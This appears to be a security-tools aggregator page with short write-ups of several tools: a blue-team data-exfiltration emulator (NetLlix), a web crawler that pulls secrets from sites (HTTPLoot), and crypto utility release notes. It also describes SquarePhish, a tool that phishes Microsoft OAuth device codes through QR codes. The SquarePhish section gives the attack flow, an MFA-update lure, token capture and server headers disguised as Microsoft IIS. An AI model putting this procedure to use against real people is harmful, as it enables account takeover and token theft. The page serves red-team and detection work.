NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:

  • CNet/WebClient: Developed in CLang to generate network traffic using the well know WIN32 API's (WININET & WINHTTP) and raw socket programming.
  • HashNet/WebClient: A C# binary to generate network traffic using .NET class like HttpClient, WebRequest and raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.

Usage:

Download the latest ZIP from realease.

Running the server:

  • With SSl: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>


cryptmount Filesystem Manager 6.1.1

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

Squarephish - An advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes


SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.

See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.


_____ _____ _ _ _
/ ____| | __ \| | (_) | |
| (___ __ _ _ _ __ _ _ __ ___| |__) | |__ _ ___| |__
\___ \ / _` | | | |/ _` | '__/ _ \ ___/| '_ \| / __| '_ \
____) | (_| | |_| | (_| | | | __/ | | | | | \__ \ | | |
|_____/ \__, |\__,_|\__,_|_| \___|_| |_| |_|_|___/_| |_|
| |
|_|
_________
| | /(
| O |/ (
|> |\ ( v0.1.0
|_________| \(

usage: squish.py [-h] {email,server} ...

SquarePhish -- v0.1.0

optional arguments:
-h, --help show this help message and exit

modules:
{email,server}
email send a malicious QR Code ema il to a provided victim
server host a malicious server QR Codes generated via the 'email' module will
point to that will activate the malicious OAuth Device Code flow

Attack Steps

An attacker can use the email module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their Microsoft MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.

By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.

The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled server (running the server module of SquarePhish), with a URL paramater set to their email address.

When the victim visits the malicious SquarePhish server, a background process is triggered that will start the OAuth Device Code authentication flow and email the victim a generated Device Code they are then required to enter into the legitimate Microsoft Device Code website (this will start the OAuth Device Code flow 15 minute timer).

The SquarePhish server will then continue to poll for authentication in the background.

[2022-04-08 14:31:51,962] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [minnow@square.phish] Polling for user authentication...

The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.

The victim will then enter the provided Device Code and will be prompted for consent.

After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.

[2022-04-08 14:32:28,796] [info] [minnow@square.phish] Token info saved to minnow@square.phish.tokeninfo.json

The current scope definition:

"scope": ".default offline_access profile openid"

Usage

!IMPORTANT: Before using either module, update the required information in the settings.config file noted with Required.

Email Module

Send the target victim a generated QR code that will trigger the OAuth Device Code flow.

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
-h, --help show this help message and exit

-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL
victim email address to send initial QR code email to

Server Module

Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
-h, --help show this help message and exit

-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]

--debug enable server debugging

Configuration

All of the applicable settings for execution can be found and modified via the settings.config file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.

Note: The SQUAREPHISH_ values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.

Custom Pretexts

Currently, the pre-defined pretexts can be found in the pretexts folder.

To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email as well as the follow up device code email.

Important: When writing a custom pretext, note the existence of %s in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).

OPSEC

There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.

{
"vary": "Accept-Encoding",
"server": "Microsoft-IIS/10.0",
"tls_version": "tls1.3",
"content-type": "text/html; charset=utf-8",
"x-appversion": "1.0.8125.42964",
"x-frame-options": "SAMEORIGIN",
"x-ua-compatible": "IE=Edge;chrome=1",
"x-xss-protection": "1; mode=block",
"x-content-type-options": "nosniff",
"strict-transport-security": "max-age=31536000",
}


GNU Privacy Guard 2.4.0

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.2.41

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

HTTPLoot - An Automated Tool Which Can Simultaneously Crawl, Fill Forms, Trigger Error/Debug Pages And "Loot" Secrets Out Of The Client-Facing Code Of Sites


An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.


Usage

To use the tool, you can grab any one of the pre-built binaries from the Releases section of the repository. If you want to build the source code yourself, you will need Go > 1.16 to build it. Simply running go build will output a usable binary for you.

Additionally you will need two json files (lootdb.json and regexes.json) alongwith the binary which you can get from the repo itself. Once you have all 3 files in the same folder, you can go ahead and fire up the tool.

Video demo:


Here is the help usage of the tool:

$ ./httploot --help
_____
)=(
/ \ H T T P L O O T
( $ ) v0.1
\___/

[+] HTTPLoot by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage of ./httploot:
-concurrency int
Maximum number of sites to process concurrently (default 100)
-depth int
Maximum depth limit to traverse while crawling (default 3)
-form-length int
Length of the string to be randomly generated for filling form fields (default 5)
-form-string string
Value with which the tool will auto-fill forms, strings will be randomly generated if no value is supplied
-input-file string
Path of the input file conta ining domains to process
-output-file string
CSV output file path to write the results to (default "httploot-results.csv")
-parallelism int
Number of URLs per site to crawl parallely (default 15)
-submit-forms
Whether to auto-submit forms to trigger debug pages
-timeout int
The default timeout for HTTP requests (default 10)
-user-agent string
User agent to use during HTTP requests (default "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0")
-verify-ssl
Verify SSL certificates while making HTTP requests
-wildcard-crawl
Allow crawling of links outside of the domain being scanned

Concurrent scanning

There are two flags which help with the concurrent scanning:

  • -concurrency: Specifies the maximum number of sites to process concurrently.
  • -parallelism: Specifies the number of links per site to crawl parallely.

Both -concurrency and -parallelism are crucial to performance and reliability of the tool results.

Crawling

The crawl depth can be specified using the -depth flag. The integer value supplied to this is the maximum chain depth of links to crawl grabbed on a site.

An important flag -wildcard-crawl can be used to specify whether to crawl URLs outside the domain in scope.

NOTE: Using this flag might lead to infinite crawling in worst case scenarios if the crawler finds links to other domains continuously.

Filling forms

If you want the tool to scan for debug pages, you need to specify the -submit-forms argument. This will direct the tool to autosubmit forms and try to trigger error/debug pages once a tech stack has been identified successfully.

If the -submit-forms flag is enabled, you can control the string to be submitted in the form fields. The -form-string specifies the string to be submitted, while the -form-length can control the length of the string to be randomly generated which will be filled into the forms.

Network tuning

Flags like:

  • -timeout - specifies the HTTP timeout of requests.
  • -user-agent - specifies the user-agent to use in HTTP requests.
  • -verify-ssl - specifies whether or not to verify SSL certificates.

Input/Output

Input file to read can be specified using the -input-file argument. You can specify a file path containing a list of URLs to scan with the tool. The -output-file flag can be used to specify the result output file path -- which by default goes into a file called httploot-results.csv.

Further Details

Further details about the research which led to the development of the tool can be found on our RedHunt Labs Blog.

License & Version

The tool is licensed under the MIT license. See LICENSE.

Currently the tool is at v0.1.

Credits

The RedHunt Labs Research Team would like to extend credits to the creators & maintainers of shhgit for the regular expressions provided by them in their repository.

To know more about our Attack Surface Management platform, check out NVADR.



Kali Linux 2022.4 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2022.4. This release has various impressive updates.

A summary of the changelog since August’s 2022.3 release:


More info here.


❌